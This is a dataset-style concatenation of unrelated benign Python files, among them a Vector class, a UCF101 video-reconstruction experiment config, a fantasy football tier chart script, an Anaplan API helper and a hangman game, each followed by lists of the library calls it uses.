def normalized(self):
divisor = [self.length()] * len(self)
return Vector(*(self / divisor))
def __iter__(self):
return py_iter(self.vals)
@classmethod
def map(cls, *args):
return args[0].map(args[1:])
def __getitem__(self, item):
return self.values[item]
def __str__(self):
return str(self.vals)
def __len__(self):
return len(self.vals)
@classmethod
def add(cls, a, b):
return Vector(*a) + Vector(*b)
@classmethod
def sub(cls, a, b):
return Vector(*a) - Vector(*b)
@classmethod
def mul(cls, a, b):
return Vector(*a) * Vector(*b)
@classmethod
def div(cls, a, b):
return Vector(*a) / Vector(*b)
@classmethod
def dot(cls, left, right):
return sum(Vector.mul(left, right))
@classmethod
def norm_dot(Vector, left, right):
left = Vector(*left).normalized()
right = Vector(*right).normalized()
return sum(Vector.mul(left, right))
| [
"math.pow",
"math.sqrt",
"itertools.starmap"
] | [((907, 923), 'math.sqrt', 'math.sqrt', (['total'], {}), '(total)\n', (916, 923), False, 'import math\n'), ((359, 390), 'itertools.starmap', 'itertools.starmap', (['op', 'pairwise'], {}), '(op, pairwise)\n', (376, 390), False, 'import itertools\n'), ((863, 877), 'math.pow', 'math.pow', (['a', '(2)'], {}), '(a, 2)\n', (871, 877), False, 'import math\n')] |
import numpy as np
import os
os.environ['TF_FORCE_GPU_ALLOW_GROWTH']='true'
import datetime
from sacred import Experiment
from sacred.observers import FileStorageObserver
from datasets.ucf101 import UCF101Dataset
from algorithms.kerasvideoonenet import KerasVideoOneNet
from algorithms.kerasvideoonenet_admm import KerasVideoOneNetADMM
from algorithms.numpyvideowaveletsparsity_admm import NumpyVideoWaveletSparsityADMM
name = os.path.basename(__file__).split('.')[0]
ex = Experiment(name)
dt = datetime.datetime.now()
results_dir = 'results/' + name + '/' + '{y:04d}{mo:02d}{d:02d}{h:02d}{mi:02d}{s:02d}_{p:05d}'.format(y=dt.year, mo=dt.month, d=dt.day, h=dt.hour, mi=dt.minute, s=dt.second, p=os.getpid()) + '_' + os.uname()[1]
ex.observers.append(FileStorageObserver.create(results_dir))
@ex.config
def cfg():
_data = {'path': 'datasets/UCF-101',
'path_split': 'datasets/ucfTrainTestlist',
'split': 1,
'batch_size': 2,
'frames': 4,
'size': 32,
'dtype': 'float32',
'problems_test': [('inpaint', {'drop_prob': 0.5}),
('center', {'box_size_ratio': 0.4}),
('block', {'box_size_ratio': 0.2,
'total_box': 10}),
('superres', {'resize_ratio': 0.5}),
('superres', {'resize_ratio': 0.25}),
('cs', {'compress_ratio': 0.1}),
('videocs', {'compress_ratio': 0.1}),
('blurdisk', {'size': 4,
'radius': 2.}),
('blurmotion', {'size': 7}),
('videoblurdisk', {'size': 4,
'radius': 2.}),
('frameinterp', {'interp_ratio': 0.5}),
('frameinterp', {'interp_ratio': 0.25}),
('prediction', {'predict_ratio': 0.75}),
('prediction', {'predict_ratio': 0.5}),
('prediction', {'predict_ratio': 0.25}),
('colorization', {})]}
_data['problems_train'] = _data['problems_test']
_algo = {'batch_size': _data['batch_size'],
'shape1': _data['frames'],
'shape2': _data['size'],
'shape3': _data['size'],
'shape4': 3,
'max_iter': 13,
'filters': 256,
'filter_size_enc': 5,
'filter_size_dec': 7,
'rnn': True,
'l2': 0.,
'epochs': 50,
'patience': 5,
'lr': 1e-4,
'clipnorm': 1.,
'dtype': _data['dtype'],
'workers': 14,
'max_queue_size': 2,
'gpus': 2}
@ex.named_config
def videoonenet():
_algo = {'mode': 'videoonenet',
'rho': 0.3}
@ex.named_config
def videoonenetadmm():
_algo = {'mode': 'videoonenetadmm',
'rho': 0.3}
@ex.named_config
def videowaveletsparsityadmm():
_algo = {'mode': 'videowaveletsparsityadmm',
'rho': 0.3,
'lambda_l1': 0.05}
@ex.named_config
def rnn():
_algo = {'rnn': True}
@ex.named_config
def nornn():
_algo = {'rnn': False}
@ex.automain
def run(_data, _algo, _rnd, _seed):
_data_train = _data.copy()
_data_train['problems'] = _data['problems_train']
data = UCF101Dataset(config=_data_train, seed=_seed)
if _algo['mode'] == 'videoonenet':
alg = KerasVideoOneNet(results_dir=results_dir, config=_algo)
elif _algo['mode'] == 'videoonenetadmm':
alg = KerasVideoOneNetADMM(results_dir=results_dir, config=_algo)
elif _algo['mode'] == 'videowaveletsparsityadmm':
alg = NumpyVideoWaveletSparsityADMM(results_dir=results_dir, config=_algo)
alg.build()
result = []
alg.train(data.seq_train, X_val=data.seq_val)
# remove threading from generator for reproducibility in testing
_algo_problem = _algo.copy()
_algo_problem['workers'] = 1
_algo_problem['max_queue_size'] = 1
alg.set_config(_algo_problem)
for problem in _data['problems_test']:
_data_test = _data.copy()
_data_test['problems'] = [problem]
# generate some test images
data.generate_sequences(config=_data_test, seed=_seed)
for b, batch in enumerate(np.linspace(0, len(data.seq_test), 32, endpoint=False).astype(np.int64)):
alg.plot_predictions(data.seq_test[batch], problem, filepath=(results_dir + '/videos_test_%04d.png') % b)
# evaluate mean loss on test images
data.generate_sequences(config=_data_test, seed=_seed)
result_test = alg.test(data.seq_test)
result.append([problem[0], problem[1], result_test])
print(result[-1])
return result
| [
"datasets.ucf101.UCF101Dataset",
"sacred.observers.FileStorageObserver.create",
"algorithms.numpyvideowaveletsparsity_admm.NumpyVideoWaveletSparsityADMM",
"sacred.Experiment",
"algorithms.kerasvideoonenet_admm.KerasVideoOneNetADMM",
"datetime.datetime.now",
"os.path.basename",
"os.getpid",
"algorith... | [((475, 491), 'sacred.Experiment', 'Experiment', (['name'], {}), '(name)\n', (485, 491), False, 'from sacred import Experiment\n'), ((497, 520), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (518, 520), False, 'import datetime\n'), ((752, 791), 'sacred.observers.FileStorageObserver.create', 'FileStorageObserver.create', (['results_dir'], {}), '(results_dir)\n', (778, 791), False, 'from sacred.observers import FileStorageObserver\n'), ((3571, 3616), 'datasets.ucf101.UCF101Dataset', 'UCF101Dataset', ([], {'config': '_data_train', 'seed': '_seed'}), '(config=_data_train, seed=_seed)\n', (3584, 3616), False, 'from datasets.ucf101 import UCF101Dataset\n'), ((718, 728), 'os.uname', 'os.uname', ([], {}), '()\n', (726, 728), False, 'import os\n'), ((3671, 3726), 'algorithms.kerasvideoonenet.KerasVideoOneNet', 'KerasVideoOneNet', ([], {'results_dir': 'results_dir', 'config': '_algo'}), '(results_dir=results_dir, config=_algo)\n', (3687, 3726), False, 'from algorithms.kerasvideoonenet import KerasVideoOneNet\n'), ((429, 455), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (445, 455), False, 'import os\n'), ((3786, 3845), 'algorithms.kerasvideoonenet_admm.KerasVideoOneNetADMM', 'KerasVideoOneNetADMM', ([], {'results_dir': 'results_dir', 'config': '_algo'}), '(results_dir=results_dir, config=_algo)\n', (3806, 3845), False, 'from algorithms.kerasvideoonenet_admm import KerasVideoOneNetADMM\n'), ((3914, 3982), 'algorithms.numpyvideowaveletsparsity_admm.NumpyVideoWaveletSparsityADMM', 'NumpyVideoWaveletSparsityADMM', ([], {'results_dir': 'results_dir', 'config': '_algo'}), '(results_dir=results_dir, config=_algo)\n', (3943, 3982), False, 'from algorithms.numpyvideowaveletsparsity_admm import NumpyVideoWaveletSparsityADMM\n'), ((697, 708), 'os.getpid', 'os.getpid', ([], {}), '()\n', (706, 708), False, 'import os\n')] |
#tiersweekly.py
from fantasyfootball import tiers
from fantasyfootball import fantasypros as fp
from fantasyfootball import config
from fantasyfootball import ffcalculator
from fantasyfootball.config import FIGURE_DIR
from sklearn.cluster import KMeans
from sklearn.mixture import GaussianMixture
from matplotlib import pyplot as plt
from matplotlib import patches as mpatches
from matplotlib.lines import Line2D
import numpy as np
import matplotlib.style as style
from datetime import date
from os import path
from collections import OrderedDict
# Roster filters used by make_clustering_viz_flex(player_list=...):
# each list names the players on one team so a chart can be restricted
# to that roster. '<NAME>' placeholders were anonymized upstream.
flex_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>']
# Roster for the "work" league.
work_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
# Roster for the "sean" league.
sean_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
# Roster for the "justin" league.
justin_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME> II',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
# Names whose spelling differs between data sources; kept for manual checks.
different_spelling = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
]
def make_clustering_viz_flex(tiers=15, kmeans=False, league=config.sean, player_cutoff=150, player_per_chart=50, x_size=20, y_size=15, covariance_type='diag', save=True, export=False, player_list=None):
    """Plot tiered range-of-rankings charts for FLEX (RB/WR/TE) players.

    tiers: number of clusters to fit.
    kmeans: if True cluster with KMeans, otherwise a Gaussian mixture.
    league: league config dict used to pull expert consensus rankings.
    player_cutoff: total number of FLEX players charted.
    player_per_chart: players per figure; multiple figures are produced.
    x_size, y_size: figure size in inches.
    covariance_type: covariance structure for the Gaussian mixture.
    save: write each figure as a PNG under FIGURE_DIR.
    export: also dump the ranked/tiered DataFrame to CSV.
    player_list: optional roster filter -- only these players are drawn.
    """
    pos = 'FLEX'
    # One color per tier; a marker shape per underlying position.
    palette = ['red', 'blue', 'green', 'orange', '#900C3F', 'maroon', 'cornflowerblue', 'greenyellow', 'coral', 'orchid', 'firebrick', 'lightsteelblue', 'palegreen', 'darkorange', 'crimson', 'darkred', 'aqua', 'forestgreen', 'navajowhite', 'mediumpurple']
    pos_shape = {
        'RB': 'o',
        'WR': 's',
        'TE': '^'
    }
    df = fp.create_fantasy_pros_ecr_df(league)
    # Derive each FLEX player's true position from the non-FLEX rows.
    pos_df = df.loc[df['pos'] != pos]
    pos_map = dict(zip(pos_df['player_name'].to_list(), pos_df['pos'].to_list()))
    df['pos_map'] = df['player_name'].map(pos_map)
    df = (df.loc[df['pos'] == pos]
            .sort_values('rank')
            .reset_index(drop=True)
            .head(player_cutoff)
            )
    df['rank'] = df['rank'].astype('int')
    today = date.today()
    date_str = today.strftime('%m.%d.%Y')
    # Cluster on the best/worst/average expert ranks.
    x = df.loc[:, ['best', 'worst', 'avg']].copy()
    if kmeans:
        kmm = KMeans(n_clusters=tiers).fit(x)
        labels = kmm.predict(x)
    else:  # Gaussian mixture
        gmm = GaussianMixture(n_components=tiers, covariance_type=covariance_type, random_state=0).fit(x)
        labels = gmm.predict(x)
    # Renumber cluster labels 1..n in the order they first appear (rank order).
    unique_labels = list(OrderedDict.fromkeys(labels))
    rank_dict = dict(zip(unique_labels, range(1,len(unique_labels)+1)))
    df['tiers'] = labels
    df['tiers'] = df['tiers'].map(rank_dict)
    style.use('ggplot')
    colors = dict(zip(range(1, tiers+1), palette[:tiers]))
    tier_lookup = dict(zip(palette[:tiers], range(1, tiers+1)))
    # Ceiling division: number of figures needed.
    chart_n = (player_cutoff // player_per_chart) + (player_cutoff % player_per_chart > 0)
    # Filter to the current team's players when a roster list is given.
    if isinstance(player_list, list):
        df = df.loc[df['player_name'].isin(player_list)].copy()
    for ix, chunk_df in enumerate(np.array_split(df, chart_n)):
        fig, ax = plt.subplots();
        min_tier = min(chunk_df['tiers'])
        max_tier = max(chunk_df['tiers'])
        # NOTE(review): this assignment is dead -- `patches` is rebuilt below.
        patches = []
        color_chunk = [colors[i] for i in range(min_tier, max_tier + 1)]
        patches = [mpatches.Patch(color=color, alpha=0.5, label=f'Tier {tier_lookup[color]}') for color in color_chunk]
        pos_patches = [Line2D([0], [0], color='gray', label=pos, marker=shape, lw=0, markersize=12) for pos, shape in pos_shape.items()]
        # One horizontal best-to-worst bar per player, colored by tier.
        for _, row in chunk_df.iterrows():
            xmin = row['best']
            xmax = row['worst']
            ymin, ymax = row['rank'], row['rank']
            center = row['avg']
            player = row['player_name'] + ', ' +row['tm'] + ' (' + row['pos_map'] + ')'
            tier = row['tiers']
            plt.scatter(center, ymax, color='gray', zorder=2, s=100, marker=pos_shape[row['pos_map']])
            plt.scatter(xmin, ymax, marker= "|", color=colors.get(tier, 'moccasin'), alpha=0.5, zorder=1)
            plt.scatter(xmax, ymax, marker= "|", color=colors.get(tier, 'moccasin'), alpha=0.5, zorder=1)
            plt.plot((xmin, xmax), (ymin, ymax), color=colors.get(tier, 'moccasin'), alpha=0.5, zorder=1, linewidth=5.0)
            plt.annotate(player, xy=(xmax+1, ymax))
        # First legend: position marker shapes.
        first_legend = plt.legend(handles=pos_patches, loc='lower left', borderpad=1, fontsize=12)
        ax = plt.gca().add_artist(first_legend)
        # Second legend: tier colors.
        plt.legend(handles=patches, borderpad=1, fontsize=12)
        if player_list is not None:
            league_name = league['name']
            plt.title(f'{date_str} Fantasy Football Weekly - {pos} - {league_name} - {ix+1}')
        else:
            plt.title(f'{date_str} Fantasy Football Weekly - {pos} {ix+1}')
        plt.xlabel('Average Expert Overall Rank')
        plt.ylabel('Expert Consensus Position Rank')
        fig.set_size_inches(x_size, y_size)
        # Best players at the top of the chart.
        plt.gca().invert_yaxis()
        #plt.tight_layout()
        if save:
            if kmeans:
                if player_list is not None:
                    plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_kmeans__FLEX_{league_name}_{ix+1}.png'))
                else:
                    plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_kmeans__{pos}_{ix+1}.png'))
            else:
                if player_list is not None:
                    plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_gmm__FLEX_list{league_name}_{ix+1}.png'))
                else:
                    plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_gmm_{pos}_{ix+1}.png'))
    if export:
        df.to_csv(path.join(FIGURE_DIR,fr'{date_str}_ecr_tiers.csv'), index=False)
    #return plt.show()
if __name__ == "__main__":
#run elbow chart or AIC/BIC chart to estimate optimal number of k for each pos
#revisit week 1 to see if URL changes for each week - if so, refactor viz func and fp df func
sean = config.sean
work = config.work
justin = config.justin
pos_tier_dict_viz = {
'RB' : 8,
'QB' : 6,
'WR' : 5,
'TE' : 5,
'DST' : 6,
'K' : 7
}
tiers.make_clustering_viz(tier_dict=pos_tier_dict_viz, league=sean, pos_n=35, covariance_type='diag', draft=False, save=True)
make_clustering_viz_flex(export=True)
make_clustering_viz_flex(league=sean, player_list=sean_list)
make_clustering_viz_flex(league=work, player_list=work_list)
make_clustering_viz_flex(league=justin, player_list=justin_list)
| [
"matplotlib.pyplot.ylabel",
"fantasyfootball.tiers.make_clustering_viz",
"numpy.array_split",
"matplotlib.pyplot.annotate",
"matplotlib.style.use",
"matplotlib.lines.Line2D",
"collections.OrderedDict.fromkeys",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.scatter",
"sklearn.mixture.GaussianMixtu... | [((2721, 2758), 'fantasyfootball.fantasypros.create_fantasy_pros_ecr_df', 'fp.create_fantasy_pros_ecr_df', (['league'], {}), '(league)\n', (2750, 2758), True, 'from fantasyfootball import fantasypros as fp\n'), ((3148, 3160), 'datetime.date.today', 'date.today', ([], {}), '()\n', (3158, 3160), False, 'from datetime import date\n'), ((3746, 3765), 'matplotlib.style.use', 'style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (3755, 3765), True, 'import matplotlib.style as style\n'), ((7407, 7537), 'fantasyfootball.tiers.make_clustering_viz', 'tiers.make_clustering_viz', ([], {'tier_dict': 'pos_tier_dict_viz', 'league': 'sean', 'pos_n': '(35)', 'covariance_type': '"""diag"""', 'draft': '(False)', 'save': '(True)'}), "(tier_dict=pos_tier_dict_viz, league=sean, pos_n=\n 35, covariance_type='diag', draft=False, save=True)\n", (7432, 7537), False, 'from fantasyfootball import tiers\n'), ((3536, 3564), 'collections.OrderedDict.fromkeys', 'OrderedDict.fromkeys', (['labels'], {}), '(labels)\n', (3556, 3564), False, 'from collections import OrderedDict\n'), ((4155, 4182), 'numpy.array_split', 'np.array_split', (['df', 'chart_n'], {}), '(df, chart_n)\n', (4169, 4182), True, 'import numpy as np\n'), ((4203, 4217), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (4215, 4217), True, 'from matplotlib import pyplot as plt\n'), ((5518, 5593), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'handles': 'pos_patches', 'loc': '"""lower left"""', 'borderpad': '(1)', 'fontsize': '(12)'}), "(handles=pos_patches, loc='lower left', borderpad=1, fontsize=12)\n", (5528, 5593), True, 'from matplotlib import pyplot as plt\n'), ((5673, 5726), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'handles': 'patches', 'borderpad': '(1)', 'fontsize': '(12)'}), '(handles=patches, borderpad=1, fontsize=12)\n', (5683, 5726), True, 'from matplotlib import pyplot as plt\n'), ((5996, 6037), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Average Expert Overall 
Rank"""'], {}), "('Average Expert Overall Rank')\n", (6006, 6037), True, 'from matplotlib import pyplot as plt\n'), ((6046, 6090), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Expert Consensus Position Rank"""'], {}), "('Expert Consensus Position Rank')\n", (6056, 6090), True, 'from matplotlib import pyplot as plt\n'), ((4416, 4490), 'matplotlib.patches.Patch', 'mpatches.Patch', ([], {'color': 'color', 'alpha': '(0.5)', 'label': 'f"""Tier {tier_lookup[color]}"""'}), "(color=color, alpha=0.5, label=f'Tier {tier_lookup[color]}')\n", (4430, 4490), True, 'from matplotlib import patches as mpatches\n'), ((4540, 4616), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'color': '"""gray"""', 'label': 'pos', 'marker': 'shape', 'lw': '(0)', 'markersize': '(12)'}), "([0], [0], color='gray', label=pos, marker=shape, lw=0, markersize=12)\n", (4546, 4616), False, 'from matplotlib.lines import Line2D\n'), ((4996, 5091), 'matplotlib.pyplot.scatter', 'plt.scatter', (['center', 'ymax'], {'color': '"""gray"""', 'zorder': '(2)', 's': '(100)', 'marker': "pos_shape[row['pos_map']]"}), "(center, ymax, color='gray', zorder=2, s=100, marker=pos_shape[\n row['pos_map']])\n", (5007, 5091), True, 'from matplotlib import pyplot as plt\n'), ((5432, 5473), 'matplotlib.pyplot.annotate', 'plt.annotate', (['player'], {'xy': '(xmax + 1, ymax)'}), '(player, xy=(xmax + 1, ymax))\n', (5444, 5473), True, 'from matplotlib import pyplot as plt\n'), ((5816, 5904), 'matplotlib.pyplot.title', 'plt.title', (['f"""{date_str} Fantasy Football Weekly - {pos} - {league_name} - {ix + 1}"""'], {}), "(\n f'{date_str} Fantasy Football Weekly - {pos} - {league_name} - {ix + 1}')\n", (5825, 5904), True, 'from matplotlib import pyplot as plt\n'), ((5924, 5989), 'matplotlib.pyplot.title', 'plt.title', (['f"""{date_str} Fantasy Football Weekly - {pos} {ix + 1}"""'], {}), "(f'{date_str} Fantasy Football Weekly - {pos} {ix + 1}')\n", (5933, 5989), True, 'from matplotlib import pyplot as plt\n'), ((3283, 3307), 
'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': 'tiers'}), '(n_clusters=tiers)\n', (3289, 3307), False, 'from sklearn.cluster import KMeans\n'), ((3387, 3475), 'sklearn.mixture.GaussianMixture', 'GaussianMixture', ([], {'n_components': 'tiers', 'covariance_type': 'covariance_type', 'random_state': '(0)'}), '(n_components=tiers, covariance_type=covariance_type,\n random_state=0)\n', (3402, 3475), False, 'from sklearn.mixture import GaussianMixture\n'), ((5607, 5616), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (5614, 5616), True, 'from matplotlib import pyplot as plt\n'), ((6144, 6153), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6151, 6153), True, 'from matplotlib import pyplot as plt\n'), ((6896, 6946), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_ecr_tiers.csv"""'], {}), "(FIGURE_DIR, f'{date_str}_ecr_tiers.csv')\n", (6905, 6946), False, 'from os import path\n'), ((6313, 6409), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_kmeans__FLEX_{league_name}_{ix + 1}.png"""'], {}), "(FIGURE_DIR,\n f'{date_str}_rangeofrankings_kmeans__FLEX_{league_name}_{ix + 1}.png')\n", (6322, 6409), False, 'from os import path\n'), ((6460, 6539), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_kmeans__{pos}_{ix + 1}.png"""'], {}), "(FIGURE_DIR, f'{date_str}_rangeofrankings_kmeans__{pos}_{ix + 1}.png')\n", (6469, 6539), False, 'from os import path\n'), ((6633, 6730), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_gmm__FLEX_list{league_name}_{ix + 1}.png"""'], {}), "(FIGURE_DIR,\n f'{date_str}_rangeofrankings_gmm__FLEX_list{league_name}_{ix + 1}.png')\n", (6642, 6730), False, 'from os import path\n'), ((6780, 6855), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_gmm_{pos}_{ix + 1}.png"""'], {}), "(FIGURE_DIR, f'{date_str}_rangeofrankings_gmm_{pos}_{ix + 1}.png')\n", (6789, 6855), False, 'from os import path\n')] |
"""Pauses the execution."""
import time
from dodo_commands.framework.decorator_utils import uses_decorator
class Decorator:
    """Dodo-commands decorator that can pause before a command runs."""

    def is_used(self, config, command_name, decorator_name):
        # Delegate to the framework helper that inspects the configuration.
        return uses_decorator(config, command_name, decorator_name)

    def add_arguments(self, parser):  # override
        parser.add_argument(
            "--pause-ms",
            type=int,
            help="Pause in milliseconds before continuing",
        )

    def modify_args(self, command_line_args, args_tree_root_node, cwd):  # override
        pause_ms = getattr(command_line_args, "pause_ms", 0)
        if pause_ms:
            # Option is given in milliseconds; time.sleep wants seconds.
            time.sleep(pause_ms / 1000)
        return args_tree_root_node, cwd
| [
"dodo_commands.framework.decorator_utils.uses_decorator",
"time.sleep"
] | [((203, 255), 'dodo_commands.framework.decorator_utils.uses_decorator', 'uses_decorator', (['config', 'command_name', 'decorator_name'], {}), '(config, command_name, decorator_name)\n', (217, 255), False, 'from dodo_commands.framework.decorator_utils import uses_decorator\n'), ((579, 624), 'time.sleep', 'time.sleep', (['(command_line_args.pause_ms / 1000)'], {}), '(command_line_args.pause_ms / 1000)\n', (589, 624), False, 'import time\n')] |
import logging
from typing import List
from .AnaplanRequest import AnaplanRequest
from .User import User
from .ModelDetails import ModelDetails
logger = logging.getLogger(__name__)
class Model(User):
    """Build and parse Anaplan model requests for the authenticated user."""

    def get_models_url(self) -> AnaplanRequest:
        """Get list of all Anaplan model for the specified user.

        :return: Object containing API request details
        :rtype: AnaplanRequest
        """
        # <base url>/<user id>/models
        url = ''.join([super().get_url(), super().get_id(), "/models"])
        get_header = {
            "Content-Type": "application/json"
        }
        return AnaplanRequest(url=url, header=get_header)

    @staticmethod
    def parse_models(model_list: dict) -> List[ModelDetails]:
        """Get list of all Anaplan model for the specified user.

        :param model_list: JSON list of models accessible to the current user
        :type model_list: dict
        :raises AttributeError: No models available for specified user.
        :return: Details for all models the user can access.
        :rtype: List[ModelDetails]
        """
        # Bug fix: start from an empty list. The previous code seeded the
        # result with the ModelDetails *class object* itself
        # (``[ModelDetails]``), corrupting the returned list.
        model_details_list: List[ModelDetails] = []
        logger.info("Parsing models...")
        if 'models' in model_list:
            models = model_list['models']
            logger.info("Finished parsing models.")
            for item in models:
                model_details_list.append(ModelDetails(item))
            return model_details_list
        else:
            raise AttributeError("Models not found in response.")
| [
"logging.getLogger"
] | [((154, 181), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (171, 181), False, 'import logging\n')] |
# Hangman game
#
# -----------------------------------
# Helper code
# You don't need to understand this helper code,
# but you will have to know how to use the functions
# (so be sure to read the docstrings!)
import random
import string
WORDLIST_FILENAME = "/Users/deedeebanh/Documents/MITx_6.00.1.x/ProblemSet3/words.txt"
def loadWords():
    """
    Returns a list of valid words. Words are strings of lowercase letters.
    Depending on the size of the word list, this function may
    take a while to finish.
    """
    print("Loading word list from file...")
    # inFile: file
    # NOTE(review): the file handle is never closed; consider a `with` block.
    inFile = open(WORDLIST_FILENAME, 'r')
    # line: string -- the whole word list is assumed to live on one line.
    line = inFile.readline()
    # wordlist: list of strings
    wordlist = line.split()
    print("  ", len(wordlist), "words loaded.")
    return wordlist
def chooseWord(wordlist):
    """
    wordlist (list): list of words (strings)
    Returns a word from wordlist at random
    """
    # random.choice raises IndexError if wordlist is empty.
    return random.choice(wordlist)
# end of helper code
# -----------------------------------
# Load the list of words into the variable wordlist
# so that it can be accessed from anywhere in the program
wordlist = loadWords()
def isWordGuessed(secretWord, lettersGuessed):
    '''
    secretWord: string, the word the user is guessing
    lettersGuessed: list, what letters have been guessed so far
    returns: boolean, True if all the letters of secretWord are in lettersGuessed;
      False otherwise
    '''
    # The word is guessed when every one of its letters has been tried.
    return all(letter in lettersGuessed for letter in secretWord)
def getGuessedWord(secretWord, lettersGuessed):
    '''
    secretWord: string, the word the user is guessing
    lettersGuessed: list, what letters have been guessed so far
    returns: string, comprised of letters and underscores that represents
      what letters in secretWord have been guessed so far.
    '''
    # Reveal each correctly guessed letter; mask the rest with underscores.
    revealed = [ch if ch in lettersGuessed else '_' for ch in secretWord]
    return ''.join(revealed)
def getAvailableLetters(lettersGuessed):
    '''
    lettersGuessed: list, what letters have been guessed so far
    returns: string, comprised of letters that represents what letters have not
      yet been guessed.
    '''
    # Keep the alphabet's ordering; drop anything already guessed.
    return ''.join(ch for ch in string.ascii_lowercase if ch not in lettersGuessed)
def hangman(secretWord):
    '''
    secretWord: string, the secret word to guess.
    Starts up an interactive game of Hangman.
    * At the start of the game, let the user know how many
      letters the secretWord contains.
    * Ask the user to supply one guess (i.e. letter) per round.
    * The user should receive feedback immediately after each guess
      about whether their guess appears in the computers word.
    * After each round, you should also display to the user the
      partially guessed word so far, as well as letters that the
      user has not yet guessed.
    Follows the other limitations detailed in the problem write-up.
    '''
    print('Welcome to the game, Hangman!')
    print('I am thinking of a word that is ' + str(len(secretWord)) + ' letters long.')
    print('-------------')
    # Player gets 8 wrong guesses before losing.
    numOfGuesses = 8
    lettersGuessed = list()
    while numOfGuesses > 0:
        print("You have " + str(numOfGuesses) + " guesses left.")
        print("Available letters: " + getAvailableLetters(lettersGuessed))
        var = input("Please guess a letter: ")
        # Normalize to lowercase so guesses match the lowercase word list.
        var = var.lower()
        if var in lettersGuessed:
            # Repeated guess: no penalty, just re-show progress.
            print("Oops! You've already guessed that letter: " + getGuessedWord(secretWord, lettersGuessed))
        elif var not in secretWord:
            # Wrong guess costs one attempt.
            print("Oops! That letter is not in my word: " + getGuessedWord(secretWord, lettersGuessed))
            lettersGuessed.append(var)
            numOfGuesses -= 1
        else:
            lettersGuessed.append(var)
            print("Good Guess: " + getGuessedWord(secretWord, lettersGuessed))
        print("------------")
        if (isWordGuessed(secretWord, lettersGuessed) == True):
            print("Congratulations, you won!")
            return 1
        # NOTE(review): the lose path also returns 1, so callers cannot
        # distinguish win from loss; the final `return 0` is unreachable
        # in normal play.
        if (numOfGuesses == 0):
            print("Sorry, you ran out of guesses. The word was " + secretWord)
            return 1
    return 0
# When you've completed your hangman function, uncomment these two lines
# and run this file to test! (hint: you might want to pick your own
# secretWord while you're testing)
# Pick a random secret word and start an interactive game.
secretWord = chooseWord(wordlist).lower()
#secretWord = 'c'
hangman(secretWord)
| [
"random.choice"
] | [((951, 974), 'random.choice', 'random.choice', (['wordlist'], {}), '(wordlist)\n', (964, 974), False, 'import random\n')] |
#!/usr/bin/python3
import argparse
from datetime import datetime
import json
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5 import uic
import os
import sys
from weather import Weather
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
DISP_SIZE = (640, 384)
WHITE = 0xffffffff
BLACK = 0xff000000
RED = 0xffff0000
def get_config(argv):
    """Build the runtime configuration dictionary.

    Command-line options are parsed first, then the JSON config file named
    by --config_file is merged on top, so file values override CLI values
    for any shared keys.
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--config_file', '-c', default=BASE_PATH + '/config.json')
    arg_parser.add_argument('--outfile', '-o', default=None)
    arg_parser.add_argument('--skip_weather', action='store_true')
    config = vars(arg_parser.parse_args(argv))
    # Merge settings from the JSON configuration file.
    with open(config['config_file']) as config_file:
        config.update(json.load(config_file))
    return config
def main():
    """Render the weather dashboard and save it or push it to the e-paper."""
    # Initialize QT in offscreen mode (no window needed)
    app = QApplication(sys.argv + '-platform offscreen'.split())
    # Disable font anti-aliasing (the e-paper has no grayscale for it)
    font = app.font()
    font.setStyleStrategy(QFont.NoAntialias)
    app.setFont(font)
    # Get configuration from command line and config file
    config = get_config(app.arguments()[1:])
    # Load fonts
    QFontDatabase.addApplicationFont(BASE_PATH + '/fonts/freefont/FreeSans.ttf')
    QFontDatabase.addApplicationFont(BASE_PATH + '/fonts/freefont/FreeSansBold.ttf')
